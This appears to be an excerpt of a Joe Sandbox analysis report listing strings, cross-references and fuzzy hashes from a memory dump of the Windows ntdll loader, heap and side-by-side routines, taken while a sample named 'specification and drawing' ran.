                                                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                          • API String ID: 0-2973941816
                                                                                                          • Opcode ID: 1aebd090ce6c6f746eaaa277a6bf79624aad96d1a2b10f55785b71251eac1e78
                                                                                                          • Instruction ID: e8e28f1c9200463874fd3f978258dbb18f485365feeb1f5eaa6238a66c58fca8
                                                                                                          • Opcode Fuzzy Hash: 1aebd090ce6c6f746eaaa277a6bf79624aad96d1a2b10f55785b71251eac1e78
                                                                                                          • Instruction Fuzzy Hash: 5F2168321481227FF73C9AAD8C95F667B98FB91E64F140108F261BE980CB74DD01C261
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                          • API String ID: 0-1109411897
                                                                                                          • Opcode ID: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                                                                          • Instruction ID: 6c576a21c4d5a32d32ed94806f0c6bd70d5d9b60c0e90f372600e8512cddb05e
                                                                                                          • Opcode Fuzzy Hash: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                                                                          • Instruction Fuzzy Hash: BDA24874A0566A8FDB68DF18C8887ADBBB1BF45704F1442EED94DA7690DB309E81CF01
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-792281065
                                                                                                          • Opcode ID: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                                                                          • Instruction ID: bb122d0767eed827f1255b902a931de53011330c9a34c4de2877a98cbd88fb2b
                                                                                                          • Opcode Fuzzy Hash: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                                                                          • Instruction Fuzzy Hash: 12915D30B017119BDB3DEF58D885BAE7BA1BF91B18F04013CE6507BA85DB75A841C791
                                                                                                          Strings
                                                                                                          • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01119A2A
                                                                                                          • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                                                                                          • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                                                                                          • Getting the shim user exports failed with status 0x%08lx, xrefs: 01119A01
                                                                                                          • apphelp.dll, xrefs: 010B6496
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-204845295
                                                                                                          • Opcode ID: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                                                                                          • Instruction ID: b6ecafaff20d3bfd58c411c607e5d39bc88ef73859be617b9c3583112308b33e
                                                                                                          • Opcode Fuzzy Hash: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                                                                                          • Instruction Fuzzy Hash: CE51E3712183089FD728DF24D891BABB7E8FB84748F40092DF5E59B194D731E944CB92
                                                                                                          Strings
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01132165
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                          • API String ID: 0-861424205
                                                                                                          • Opcode ID: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                                                                          • Instruction ID: 6e127fdb177a1f582d6d2d2b23d2fe43980669737708a549d70b95a3496ffef8
                                                                                                          • Opcode Fuzzy Hash: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                                                                          • Instruction Fuzzy Hash: A5310536B40325B7EB259A998C42F6A7B68EBA5A90F05405DFB44AB244D370DE01C6E1
                                                                                                          Strings
                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                                                                                          • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                                                                                          • LdrpInitializeProcess, xrefs: 010FC6C4
                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-475462383
                                                                                                          • Opcode ID: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                                                                                          • Instruction ID: 02472dba63e018ba4b8d85e01c9022a1059ab4364075cd3145f0935ca88a5f24
                                                                                                          • Opcode Fuzzy Hash: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                                                                                          • Instruction Fuzzy Hash: 3A3125717483069FD228EF29D986E5AB7D4EFD4B14F04056CF9C56B291D720EC04C7A2
                                                                                                          APIs
                                                                                                            • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 1404860816-0
                                                                                                          • Opcode ID: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                                                                          • Instruction ID: 851b17f4cb71c027e1d195b89e615a79eba8706e372ee2490eea5fb9035ca3b7
                                                                                                          • Opcode Fuzzy Hash: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                                                                          • Instruction Fuzzy Hash: FA427071900715DFDB29CF28C840BAAB7F4FF48314F1445A9E989EB285E7B0A985CF61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                          • API String ID: 0-379654539
                                                                                                          • Opcode ID: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                                                                          • Instruction ID: 37d5dce524c0e2fba15246abd82e495db571a7721696b9ee90bbe3c3332ece33
                                                                                                          • Opcode Fuzzy Hash: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                                                                          • Instruction Fuzzy Hash: 6CC1577460838ACBD715DF58C044B6EB7E4BB98B04F04896EF9D68B251E734CA49CF52
                                                                                                          Strings
                                                                                                          • @, xrefs: 010F8591
                                                                                                          • LdrpInitializeProcess, xrefs: 010F8422
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1918872054
                                                                                                          • Opcode ID: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                                                                          • Instruction ID: 5dfabe56bfb77d231692168b9260ba66100c9d621794ed4900cd4113a8538ae2
                                                                                                          • Opcode Fuzzy Hash: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                                                                          • Instruction Fuzzy Hash: 7A91BD71608345AFDB26EF25CC45EABBAE8BF84B44F40492EFAC496140E774D904CB62
                                                                                                          Strings
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                                                                                          • .Local, xrefs: 010F28D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                          • API String ID: 0-1239276146
                                                                                                          • Opcode ID: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                                                                          • Instruction ID: 74f3399708ea131046782e5ef1d07d06cadb9c6ad6c5824e7fb6c4f4ce7bdcf8
                                                                                                          • Opcode Fuzzy Hash: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                                                                          • Instruction Fuzzy Hash: E1A1D13190522ADBDB24DF68CC85BA9B3B0BF98354F1541EDDA88AB651D730DE80CF90
                                                                                                          Strings
                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
                                                                                                          • RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                          • API String ID: 0-1245972979
                                                                                                          • Opcode ID: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                                                                                          • Instruction ID: 7c9476fa8fae1320ed408e567c3881944bc983d8145b604acdfa1b89965f5fbd
                                                                                                          • Opcode Fuzzy Hash: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                                                                                          • Instruction Fuzzy Hash: 4D6111326107069BD72ACF1CC882B2AB7E0BF80B60F15856DEEA5DB645D730E801CBD5
                                                                                                          Strings
                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                          • API String ID: 0-1468400865
                                                                                                          • Opcode ID: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                                                                          • Instruction ID: 6e3dbe82ba4a9379c3cbbce05b2c7fcc2059d1d3c243e9333404edaf7d2a3cda
                                                                                                          • Opcode Fuzzy Hash: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                                                                          • Instruction Fuzzy Hash: E071C1719043059FCB21DF18C884F9B7BA8AFA4B54F10056CF9888B286D775D589CFD2
                                                                                                          Strings
                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                                                                                          • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                          • API String ID: 0-3779518884
                                                                                                          • Opcode ID: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                                                                          • Instruction ID: eb2de068767d90bd52a923a3454bcee08583103061ea069206cc4e17b795195d
                                                                                                          • Opcode Fuzzy Hash: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                                                                          • Instruction Fuzzy Hash: 75312C329006119EEF3ABB0CC88BB6776E4BB01654F0A81ADDFD4D7AD1D7A09CC08795
                                                                                                          Strings
                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                                                                          • apphelp.dll, xrefs: 010E2462
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                                                                          • LdrpDynamicShimModule, xrefs: 0112A998
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-176724104
                                                                                                          • Opcode ID: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                                                                          • Instruction ID: 1c5ca71988d748b52b917a07663a39288ea535c53b8989a5c6cb1e12b6f24173
                                                                                                          • Opcode Fuzzy Hash: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                                                                          • Instruction Fuzzy Hash: C6316AB5B00312ABDB3D9F5AE8C5AAA7BB9FF84B04F150039E960A7244D77058D1CB40
                                                                                                          Strings
                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                                                                          • HEAP[%wZ]: , xrefs: 010D3255
                                                                                                          • HEAP: , xrefs: 010D3264
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                          • API String ID: 0-617086771
                                                                                                          • Opcode ID: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                                                                          • Instruction ID: 475ed4feeeba332068d94cd1781b20629714955c81ecaef2b9f86ab9743b526f
                                                                                                          • Opcode Fuzzy Hash: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                                                                          • Instruction Fuzzy Hash: 8392BA71A043499FDB29CF68C440BAEBBF1FF48314F1880A9E999AB391D735A941CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-4253913091
                                                                                                          • Opcode ID: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                                                                          • Instruction ID: 99100de74a788c03772876d0d40a2bdfc7f790d6981f5bf6684758563e397acd
                                                                                                          • Opcode Fuzzy Hash: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                                                                          • Instruction Fuzzy Hash: 31F1AF70A00606DFEB19CF68C894BAEB7F6FF45304F1481A8E59A9B385D734E981CB51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $@
                                                                                                          • API String ID: 0-1077428164
                                                                                                          • Opcode ID: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                                                                          • Instruction ID: 52e4931020aabdec7165356128bde71e178995303650eef2eae0c0729f136ea3
                                                                                                          • Opcode Fuzzy Hash: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                                                                          • Instruction Fuzzy Hash: FFC29F716083519FDB69CF29C844BAFBBE5AF88704F04892DFAC987241D775D844CB92
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                          • API String ID: 0-2779062949
                                                                                                          • Opcode ID: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                                                                          • Instruction ID: 2d864cebcfe6f4160263d437f8f11a5fc63a3424430284e06413e83bd80f5e33
                                                                                                          • Opcode Fuzzy Hash: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                                                                          • Instruction Fuzzy Hash: F1A16B719556299BDB35EF68CC88BEAF7B8EF48700F1001E9E909A7250D7359E84CF90
                                                                                                          Strings
                                                                                                          • LdrpCheckModule, xrefs: 0112A117
                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-161242083
                                                                                                          • Opcode ID: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                                                                          • Instruction ID: 904566c8b69e316d976c34525813e0f37571152098203e2bc0bb6e2f4cec75f6
                                                                                                          • Opcode Fuzzy Hash: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                                                                          • Instruction Fuzzy Hash: 1971FF70A0030A9FDB29EF69C984AAEB7F4FF44704F14447DE992AB605E374A991CB40
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-1334570610
                                                                                                          • Opcode ID: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                                                                          • Instruction ID: ca6bb4458fa4b1531834fbf30c01973d007c1d70096f737b70df047d46f21856
                                                                                                          • Opcode Fuzzy Hash: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                                                                          • Instruction Fuzzy Hash: 6661B070604301DFDB69CF28C484BAABBE2FF45714F148599F4998F296D770E891CB91
                                                                                                          Strings
                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1783798831
                                                                                                          • Opcode ID: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                                                                          • Instruction ID: 568623773298b4247406192f69ae01e7b12bb89c63f8b6846575928830609e07
                                                                                                          • Opcode Fuzzy Hash: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                                                                          • Instruction Fuzzy Hash: 5F4120B1504309ABD728EB69D986F9B77E8BF58710F00493EFA94D7290E770D840CB91
                                                                                                          Strings
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                                                                          • @, xrefs: 0117C1F1
                                                                                                          • PreferredUILanguages, xrefs: 0117C212
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                          • API String ID: 0-2968386058
                                                                                                          • Opcode ID: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                                                                          • Instruction ID: e1ab0fdb7325ed18f4a15093bf5b3f9bf81291367bc537749ab778e8c461bd67
                                                                                                          • Opcode Fuzzy Hash: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                                                                          • Instruction Fuzzy Hash: 4B415671E0020AEBDF19DFD8C855FEEB7B9AB54704F14416AE605F7280D7749A44CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                          • API String ID: 0-1373925480
                                                                                                          • Opcode ID: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                                                                          • Instruction ID: 35d0219708588b32bea3c68e3fdda6c9c2a8e877761f23db1ce044e0647c9bd9
                                                                                                          • Opcode Fuzzy Hash: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                                                                          • Instruction Fuzzy Hash: 56412272A00368CBEB2ADBD9D844BADBBB4FF55380F140059DD61EBB81E7349981CB11
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
